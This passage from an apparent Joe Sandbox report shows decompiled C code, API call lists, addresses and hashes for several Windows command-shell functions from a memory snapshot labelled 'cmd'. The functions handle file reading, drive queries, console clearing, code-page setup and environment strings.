                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,?,00000000,00000000), ref: 011F8F2F
                                      • Part of subcall function 011F85E9: longjmp.MSVCRT(0120B8F8,00000001,00000000,011F8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 011F865D
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86B6
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F86E4
                                      • Part of subcall function 011F85E9: memset.MSVCRT ref: 011F8712
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 011F8F40
                                      • Part of subcall function 011DDB92: _close.MSVCRT ref: 011DDBC1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$File_get_osfhandle$ErrorLastPointerRead_closelongjmp
                                    • String ID:
                                    • API String ID: 288106245-0
                                    • Opcode ID: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                    • Instruction ID: 23731189a15aac567ff3350d6f0802bc93be1c5c9a511d952ba88e2b1329f2a5
                                    • Opcode Fuzzy Hash: 773e027faaebab1219d787cd66d324fdce7f244a37c1f36f93db1f2f4a614266
                                    • Instruction Fuzzy Hash: 0C31D171E10219AFEF2CDF69D859BAE77AAEB94324F10812EE601C72C5DF7099408B50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5712, Relevance: 7.6, APIs: 5, Instructions: 98fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 85%
                                    			E011D5712(void* __ecx, long __edx, DWORD* _a4, struct _OVERLAPPED* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				char _v8;
				intOrPtr _v16;
				void* _t19;
				signed int _t26;
				void* _t31;
				void* _t32;
				intOrPtr* _t33;
				signed int _t43;
				intOrPtr _t52;
				void* _t54;
				struct _OVERLAPPED* _t55;
				void* _t58;
				void* _t59;

				_t55 = _a8;
				_t33 = __edx;
				_v8 = 0;
				_t59 = __ecx;
				 *0x11fd5cc = 0;
				__imp___get_osfhandle(0, _t54, _t58, _t32, __ecx, __ecx);
				if(ReadFile(0, __ecx, __edx, _a4, _t55) == 0) {
					L18:
					 *0x1213cf0 = GetLastError();
					_t19 = E011E0178(E011DDB92(_t59));
					E011DDB92(_a16);
					if(_t19 == 0) {
						DeleteFileW(_a20);
					}
					E011F85E9( *0x1213cf0, 1);
					asm("int3");
					E011E1040(_v8, _t55, _v16);
					return 0;
				} else {
					_t43 = _t55->Internal;
					if(_t43 == 0) {
						if(GetLastError() == 0x3e3) {
							goto L18;
						} else {
							_t43 = _t55->Internal;
							if(_t43 != 0) {
								goto L2;
							} else {
								 *0x1213cf0 =  *0x1213cf0 & _t43;
								_t31 = 0;
							}
							goto L5;
						}
					} else {
						L2:
						_t52 = _a12;
						_t26 =  *(_t52 + 0x1c);
						if((_t26 & 0x0000c000) == 0) {
							if(_t43 < 2 ||  *_t33 != 0xfeff) {
								_t26 = _t26 | 0x00008000;
							} else {
								_t26 = _t26 | 0x00004000;
							}
							 *(_t52 + 0x1c) = _t26;
						}
						if((_t26 & 0x00008002) == 0x8002) {
							E011F6CEF(1, _t33, _t55,  &_v8);
							if(_t55->Internal != _t55->Internal) {
								 *0x11fd5cc = 1;
							}
						}
						_t31 = 1;
						L5:
						return _t31;
					}
				}
			}
















                                    0x011d571c
                                    0x011d5726
                                    0x011d5728
                                    0x011d572b
                                    0x011d572d
                                    0x011d5734
                                    0x011d5744
                                    0x011e974a
                                    0x011e9752
                                    0x011e975f
                                    0x011e9769
                                    0x011e9770
                                    0x011e9775
                                    0x011e9775
                                    0x011e9784
                                    0x011e9789
                                    0x011e9792
                                    0x011d583e
                                    0x011d574a
                                    0x011d574a
                                    0x011d574e
                                    0x011e9709
                                    0x00000000
                                    0x011e970b
                                    0x011e970b
                                    0x011e970f
                                    0x00000000
                                    0x011e9715
                                    0x011e9715
                                    0x011e971b
                                    0x011e971b
                                    0x00000000
                                    0x011e970f
                                    0x011d5754
                                    0x011d5754
                                    0x011d5754
                                    0x011d5757
                                    0x011d575f
                                    0x011d577f
                                    0x011d578b
                                    0x011d5795
                                    0x011d5795
                                    0x011d5795
                                    0x011d5790
                                    0x011d5790
                                    0x011d576a
                                    0x011e972e
                                    0x011e9735
                                    0x011e973b
                                    0x011e973b
                                    0x011e9735
                                    0x011d5772
                                    0x011d5773
                                    0x011d5779
                                    0x011d5779
                                    0x011d574e

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011D5734
                                    • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011F896D,00000021,?,?,00000000,?,?,?,?,?,00000000,?,00000021,00000000,?), ref: 011D573C
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E96FE
                                    • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,?,00000000,00000000), ref: 011E974A
                                    • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00000000,00000000), ref: 011E9775
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                    • String ID:
                                    • API String ID: 3588551418-0
                                    • Opcode ID: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                    • Instruction ID: 94303b79d4cea92381e1c686a523375f7286b7d0a4788e33adbbe26041e15c91
                                    • Opcode Fuzzy Hash: f659bcab8664d38da087e5813f7fecc5e2366bad65e6bd2f27abcbf9ddb15866
                                    • Instruction Fuzzy Hash: DA31B135A00506DBEF2CDF69E85C97A7BBAFB94259B624429E902C7294DF309C40CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6A96, Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 82%
                                    			E011E6A96(short __ecx) {
				signed int _v8;
				short _v14;
				short _v16;
				short _v18;
				short _v20;
				long _v28;
				char _v32;
				int _v36;
				void _v556;
				long _v564;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t22;
				short _t34;
				short _t35;
				int _t38;
				WCHAR* _t39;
				void* _t50;
				short _t51;
				DWORD* _t52;
				signed int _t54;

				_t22 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t22 ^ _t54;
				_v32 = 1;
				_t52 = 0;
				_v28 = 0x104;
				_v36 = 0;
				_t51 = __ecx;
				memset( &_v556, 0, 0x104);
				if(E011E0C70( &_v556, ((0 | _v32 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					_t34 = 0x3a;
					_v18 = _t34;
					_t35 = 0x5c;
					_v16 = _t35;
					_v14 = 0;
					_v20 = _t51;
					_t38 = GetDriveTypeW( &_v20);
					if(_t38 <= 1) {
						L8:
						_t52 = 1;
					} else {
						if(_t38 != 2 && _t38 != 5) {
							_t39 = _v36;
							if(_t39 == 0) {
								_t39 =  &_v556;
							}
							if(GetVolumeInformationW( &_v20, _t39, _v28,  &_v564, _t52, _t52, _t52, _t52) == 0) {
								if(GetLastError() == 5) {
									goto L8;
								}
							}
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t52, 0x104, _v8 ^ _t54, _t50, _t51, _t52, _v36);
			}

























                                    0x011e6aa1
                                    0x011e6aa8
                                    0x011e6ab3
                                    0x011e6ab7
                                    0x011e6ab9
                                    0x011e6ac3
                                    0x011e6ac8
                                    0x011e6acb
                                    0x011e6af1
                                    0x011e6af5
                                    0x011e6af6
                                    0x011e6afc
                                    0x011e6afd
                                    0x011e6b03
                                    0x011e6b0b
                                    0x011e6b0f
                                    0x011e6b18
                                    0x011e6b71
                                    0x011e6b73
                                    0x011e6b1a
                                    0x011e6b1d
                                    0x011e6b24
                                    0x011e6b29
                                    0x011e6b69
                                    0x011e6b69
                                    0x011e6b46
                                    0x011f156d
                                    0x00000000
                                    0x011f1573
                                    0x011f156d
                                    0x011e6b46
                                    0x011e6b1d
                                    0x011e6b18
                                    0x011e6b4f
                                    0x011e6b68

                                    APIs
                                    • memset.MSVCRT ref: 011E6ACB
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,-00000001,?,?,00000000), ref: 011E6B0F
                                    • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000000,00000000,00000000,00000000), ref: 011E6B3E
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011E6B4F
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DriveInformationTypeVolume
                                    • String ID:
                                    • API String ID: 285405857-0
                                    • Opcode ID: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                    • Instruction ID: 86f3d03b8a6e16212ce5322eb9d1fbbe6b5c0d355f4806a6a26269132e3a02a2
                                    • Opcode Fuzzy Hash: 56ff5f9e2a87cb4280d50d4b4de377f84d8b740715e64142e4a7bc93ea9d9610
                                    • Instruction Fuzzy Hash: 8C21A371E00118ABDF28DBE8DC4DAEFBBB8EF15754F44056AE505E3150EB359A40CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E0662, Relevance: 7.6, APIs: 5, Instructions: 75COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 24%
                                    			E011E0662(signed short** __ecx) {
				signed int _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t4;
				void* _t6;
				long _t8;
				signed int _t11;
				void* _t12;
				signed int _t15;
				long _t16;
				void* _t17;
				void* _t20;
				void* _t24;
				signed short** _t30;
				void* _t31;
				long _t33;
				void* _t34;
				signed int _t35;

				_push(__ecx);
				_t4 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t4 ^ _t35;
				_push(_t15);
				_t30 = __ecx;
				_t28 = 0x8000;
				_t19 =  *__ecx;
				_t6 = E011DD120( *__ecx, 0x8000, __ecx);
				_t16 = _t15 | 0xffffffff;
				while(1) {
					_t33 = _t6;
					if(_t33 != _t16) {
						break;
					}
					if( *0x1213cf0 != 2) {
						_t20 = 0x6e;
						E011F985A(_t20);
						goto L12;
					} else {
						_t11 =  *( *_t30) & 0x0000ffff;
						if(_t11 == 0x41 || _t11 == 0x42) {
							_t12 = E011DC5A2(_t19);
							_t24 = 0x2341;
							__imp___getch(0);
							if(_t12 == 3) {
								EnterCriticalSection( *0x1203858);
								 *0x11fd544 = 1;
								LeaveCriticalSection( *0x1203858);
								goto L12;
							} else {
								_t19 =  *_t30;
								_t28 = 0x8000;
								_t6 = E011DD120( *_t30, 0x8000, _t24);
								continue;
							}
						} else {
							_push(0);
							_push(0x236c);
							E011DC5A2(_t19);
							L12:
							_t8 = _t16;
						}
					}
					L3:
					_pop(_t31);
					_pop(_t34);
					_pop(_t17);
					return E011E6FD0(_t8, _t17, _v8 ^ _t35, _t28, _t31, _t34);
				}
				__imp___get_osfhandle(0);
				SetFilePointer(_t6, _t33, _t30[2], 0);
				_t8 = _t33;
				goto L3;
			}






















                                    0x011e0667
                                    0x011e0668
                                    0x011e066f
                                    0x011e0672
                                    0x011e0675
                                    0x011e0677
                                    0x011e067d
                                    0x011e067f
                                    0x011e0684
                                    0x011e0687
                                    0x011e0687
                                    0x011e068b
                                    0x00000000
                                    0x00000000
                                    0x011ecb84
                                    0x011ecbf6
                                    0x011ecbf7
                                    0x00000000
                                    0x011ecb86
                                    0x011ecb88
                                    0x011ecb8e
                                    0x011ecbac
                                    0x011ecbb2
                                    0x011ecbb3
                                    0x011ecbbc
                                    0x011ecbd6
                                    0x011ecbe2
                                    0x011ecbec
                                    0x00000000
                                    0x011ecbbe
                                    0x011ecbbf
                                    0x011ecbc1
                                    0x011ecbc6
                                    0x00000000
                                    0x011ecbc6
                                    0x011ecb95
                                    0x011ecb95
                                    0x011ecb97
                                    0x011ecb9c
                                    0x011ecbfc
                                    0x011ecbfc
                                    0x011ecbfc
                                    0x011ecb8e
                                    0x011e06a9
                                    0x011e06ac
                                    0x011e06ad
                                    0x011e06b0
                                    0x011e06b9
                                    0x011e06b9
                                    0x011e0699
                                    0x011e06a1
                                    0x011e06a7
                                    0x00000000

                                    APIs
                                    • _get_osfhandle.MSVCRT ref: 011E0699
                                    • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D69F2,?,00000001,?,?,00000000), ref: 011E06A1
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: FilePointer_get_osfhandle
                                    • String ID:
                                    • API String ID: 1013686580-0
                                    • Opcode ID: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                    • Instruction ID: a71ef4aaead2248e08f059e014b95d27990d2079652d11dd5acb87c48134e80e
                                    • Opcode Fuzzy Hash: 3386d17ffc2c5c24d1f54361adbaf0be4cc72edb537c38a8cd2683ed2d2906a0
                                    • Instruction Fuzzy Hash: D7110232200606AFEB3CABACBC5DB2A7BE5EB58364F200519F105971C4CFA29980C791
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F7EC0, Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 73%
                                    			E011F7EC0(void* __ebx, void* __edx, void* __edi, void* __esi) {
				signed int _v8;
				signed int _v30;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				struct _CHAR_INFO _v36;
				struct _COORD _v40;
				struct _SMALL_RECT _v48;
				signed int _t19;
				union %anon259 _t30;
				void* _t42;
				void* _t49;
				void* _t50;
				void* _t52;
				signed int _t53;

				_t51 = __esi;
				_t50 = __edi;
				_t49 = __edx;
				_t42 = __ebx;
				_t19 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t19 ^ _t53;
				if(E011E0178(_t19 ^ _t53) != 0) {
					_push(__esi);
					_t52 = GetStdHandle(0xfffffff5);
					if(GetConsoleScreenBufferInfo(_t52,  &_v32) != 0) {
						_v40.Y =  ~_v30;
						_v40.X = 0;
						_v48.Left = 0;
						_v48.Bottom = _v30;
						_v48.Right = _v32.dwSize;
						_t30 = 0x20;
						_v36.UnicodeChar = _t30;
						_v36.Attributes = _v32.wAttributes;
						ScrollConsoleScreenBufferW(_t52,  &_v48, 0, _v40,  &_v36);
						_v32.dwCursorPosition = 0;
						SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0);
					} else {
						E011E25D9(0x11d3c88);
					}
					_pop(_t51);
				} else {
					E011E25D9(0x11d3c88);
				}
				return E011E6FD0(0, _t42, _v8 ^ _t53, _t49, _t50, _t51);
			}
















                                    0x011f7ec0
                                    0x011f7ec0
                                    0x011f7ec0
                                    0x011f7ec0
                                    0x011f7ec8
                                    0x011f7ecf
                                    0x011f7edc
                                    0x011f7eee
                                    0x011f7ef7
                                    0x011f7f06
                                    0x011f7f1a
                                    0x011f7f20
                                    0x011f7f24
                                    0x011f7f2b
                                    0x011f7f35
                                    0x011f7f39
                                    0x011f7f3a
                                    0x011f7f42
                                    0x011f7f54
                                    0x011f7f5f
                                    0x011f7f69
                                    0x011f7f08
                                    0x011f7f0d
                                    0x011f7f12
                                    0x011f7f6f
                                    0x011f7ede
                                    0x011f7ee3
                                    0x011f7ee8
                                    0x011f7f7f

                                    APIs
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 011F7EF1
                                    • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 011F7EFE
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: BufferConsoleFileHandleInfoScreenType_get_osfhandle
                                    • String ID:
                                    • API String ID: 2847887402-0
                                    • Opcode ID: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                    • Instruction ID: e12c5198fc3f268a288462e2deeb706a6c92e8849a782baa7016f011173683a3
                                    • Opcode Fuzzy Hash: 815e8209c4c19c277aeea599712e0ef134a3d18cd5f92f181ae0175ee7635e2a
                                    • Instruction Fuzzy Hash: 0B212E7591420A9ACF14EFF4A918AFEB7B8EF1C614F10011AE915E7180EB349981876A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E46D8, Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E46D8() {
				int _t3;
				signed int _t6;
				void* _t7;
				void* _t8;
				signed int _t10;
				signed int _t13;
				signed char* _t15;
				void* _t17;
				void* _t18;

				_t3 = GetConsoleOutputCP();
				 *0x1203854 = _t3;
				if(GetCPInfo(_t3, 0x1203840) == 0) {
					_t6 = GetThreadLocale() & 0x000003ff;
					if(_t6 != 0x11) {
						if(_t6 == 4 || _t6 == 0x12) {
							 *0x1203846 = 0xfe81;
						} else {
							 *0x1203846 = 0;
						}
					} else {
						 *0x1203846 = 0xfce09f81;
						 *0x120384a = 0;
					}
				}
				_t7 = memset(0x1217f30, 0, 0x100);
				_t18 = _t17 + 0xc;
				if( *0x1203846 != 0) {
					_t15 = 0x1203846;
					while(1) {
						_t8 = _t15[1];
						if(_t8 == 0) {
							break;
						}
						_t13 =  *_t15 & 0x000000ff;
						_t10 = _t8 & 0x000000ff;
						if(_t13 <= _t10) {
							_t8 = memset(0x1217f30 + _t13, 1, _t10 - _t13 + 1);
							_t18 = _t18 + 0xc;
						}
						_t15 =  &(_t15[2]);
						if( *_t15 != 0) {
							continue;
						}
						break;
					}
					return _t8;
				} else {
					return _t7;
				}
			}












                                    0x011e46d8
                                    0x011e46e4
                                    0x011e46f1
                                    0x011ee8be
                                    0x011ee8c7
                                    0x011ee8e5
                                    0x011ee8fb
                                    0x011ee8ed
                                    0x011ee8ed
                                    0x011ee8ed
                                    0x011ee8c9
                                    0x011ee8c9
                                    0x011ee8d3
                                    0x011ee8d3
                                    0x011ee8c7
                                    0x011e4703
                                    0x011e4708
                                    0x011e4712
                                    0x011ee90b
                                    0x011ee910
                                    0x011ee910
                                    0x011ee915
                                    0x00000000
                                    0x00000000
                                    0x011ee917
                                    0x011ee91a
                                    0x011ee91f
                                    0x011ee92e
                                    0x011ee933
                                    0x011ee933
                                    0x011ee936
                                    0x011ee93c
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ee93c
                                    0x011ee93f
                                    0x011e4718
                                    0x011e4718
                                    0x011e4718

                                    APIs
                                    • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(011E458C), ref: 011E46D8
                                    • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,01203840), ref: 011E46E9
                                    • memset.MSVCRT ref: 011E4703
                                    • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 011EE8B8
                                    • memset.MSVCRT ref: 011EE92E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$ConsoleInfoLocaleOutputThread
                                    • String ID:
                                    • API String ID: 1263632223-0
                                    • Opcode ID: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                    • Instruction ID: 23d803f6c67ad00235022ed27ea3fdaad82514ab50e12a368eaad7b1648e3c5e
                                    • Opcode Fuzzy Hash: e2dde94db979ae5bd27ea8495d7740b0ab37d297359a0251ed8715680f1c201f
                                    • Instruction Fuzzy Hash: 4F118970D18A519FEB3EDF98B80D7713BC0BB10720F4802AAE5C15A58AF7A842C5C756
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F3BB0, Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 63%
                                    			E011F3BB0(void* __eflags) {
				signed int _v8;
				char _v12;
				void* __ecx;
				void* _t7;
				signed short _t13;
				signed int _t14;
				void* _t15;
				void* _t22;
				void* _t23;

				_push(_t15);
				_push(_t15);
				_t23 = GetStdHandle(0xfffffff6);
				_t7 = E011DC108(_t15, 0x232b, 0, _t22);
				if(_t23 != 0) {
					if(E011E0178(_t7) == 0 || ( *0x1213aa0 & 0x00000001) == 0) {
						E011F3B11(_t23,  &_v8, 1,  &_v12);
					} else {
						_t13 = FlushConsoleInputBuffer(_t23);
						__imp___getch();
						_t14 = _t13 & 0x0000ffff;
						_v8 = _t14;
						if(_t14 == 3) {
							EnterCriticalSection( *0x1203858);
							 *0x11fd544 = 1;
							LeaveCriticalSection( *0x1203858);
						}
					}
				}
				E011E25D9(L"\r\n");
				return 0;
			}












                                    0x011f3bb5
                                    0x011f3bb6
                                    0x011f3bc7
                                    0x011f3bc9
                                    0x011f3bd2
                                    0x011f3bdd
                                    0x011f3c30
                                    0x011f3be8
                                    0x011f3be9
                                    0x011f3bef
                                    0x011f3bf5
                                    0x011f3bf8
                                    0x011f3bff
                                    0x011f3c07
                                    0x011f3c13
                                    0x011f3c1d
                                    0x011f3c1d
                                    0x011f3bff
                                    0x011f3bdd
                                    0x011f3c3a
                                    0x011f3c46

                                    APIs
                                    • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,?,?,?,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BBA
                                      • Part of subcall function 011E0178: _get_osfhandle.MSVCRT ref: 011E0183
                                      • Part of subcall function 011E0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,011ED6A1), ref: 011E018D
                                    • FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3BE9
                                    • _getch.MSVCRT ref: 011F3BEF
                                    • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C07
                                    • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,011E997F,00000000,?,011FA0FC,?,?,?), ref: 011F3C1D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CriticalSection$BufferConsoleEnterFileFlushHandleInputLeaveType_get_osfhandle_getch
                                    • String ID:
                                    • API String ID: 491502236-0
                                    • Opcode ID: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction ID: abd1d2d664a651f4f02b1e5ca1b83fe43c9fe2bf23d56590595e316bbb62bdb6
                                    • Opcode Fuzzy Hash: 286fea7131610a01551c214ef4a9d74bfa9301aa56eb28e935ab3ce3ac056a43
                                    • Instruction Fuzzy Hash: 0B01D832514255AFDB2DEB65BC1DBAA7BA9FB10324F00025EFA1682084DFB18A80C351
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E3AAE, Relevance: 7.5, APIs: 5, Instructions: 32memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E3AAE() {
				int _t9;
				void* _t12;
				WCHAR* _t13;

				_t13 = GetEnvironmentStringsW();
				_t12 = 0;
				if(_t13 != 0) {
					_t9 = E011E3B00(_t13);
					_t12 = HeapAlloc(GetProcessHeap(), 8, _t9);
					if(_t12 != 0) {
						memcpy(_t12, _t13, _t9);
					}
					FreeEnvironmentStringsW(_t13);
				}
				return _t12;
			}






                                    0x011e3ab8
                                    0x011e3aba
                                    0x011e3abe
                                    0x011e3ac8
                                    0x011e3ada
                                    0x011e3ade
                                    0x011e3ae3
                                    0x011e3ae8
                                    0x011e3aec
                                    0x011e3af2
                                    0x011e3af7

                                    APIs
                                    • GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000,00000000,011E3A9F), ref: 011E3AB2
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,00000000), ref: 011E3ACD
                                    • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 011E3AD4
                                    • memcpy.MSVCRT ref: 011E3AE3
                                    • FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(00000000), ref: 011E3AEC
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: EnvironmentHeapStrings$AllocFreeProcessmemcpy
                                    • String ID:
                                    • API String ID: 713576409-0
                                    • Opcode ID: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction ID: f84b0b0ddba6df0dee14cdd1735a99c968783b6c124e7ce4adbd897c6478f49f
                                    • Opcode Fuzzy Hash: d1c4b641443313ddeaa8d7f896aaf08c0ccb79adb899698d60ed3f1e93d1757e
                                    • Instruction Fuzzy Hash: 34E09273A0091167DA3166AE7C5CDAF6DAEEBD99657150058F91AC3204DF308CC246B2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E5266, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 303COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 90%
                                    			E011E5266(void* __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				int _v16;
				signed int _v20;
				signed int _v24;
				int _v28;
				intOrPtr _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				char** _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				void _v76;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void _v124;
				unsigned int _t115;
				void* _t123;
				intOrPtr _t129;
				void* _t138;
				signed int _t140;
				signed int _t141;
				signed int _t143;
				signed int _t144;
				signed int _t145;
				intOrPtr _t146;
				void* _t147;
				intOrPtr _t152;
				intOrPtr _t162;
				char _t163;
				char* _t164;
				void* _t168;
				void* _t172;
				char* _t180;
				char* _t181;
				void* _t182;
				signed int _t183;
				signed int _t195;
				void* _t196;
				void* _t197;
				intOrPtr* _t198;
				intOrPtr _t203;
				intOrPtr _t204;
				intOrPtr _t210;
				signed int _t211;
				signed int _t216;
				signed int _t218;
				void* _t220;
				void* _t222;
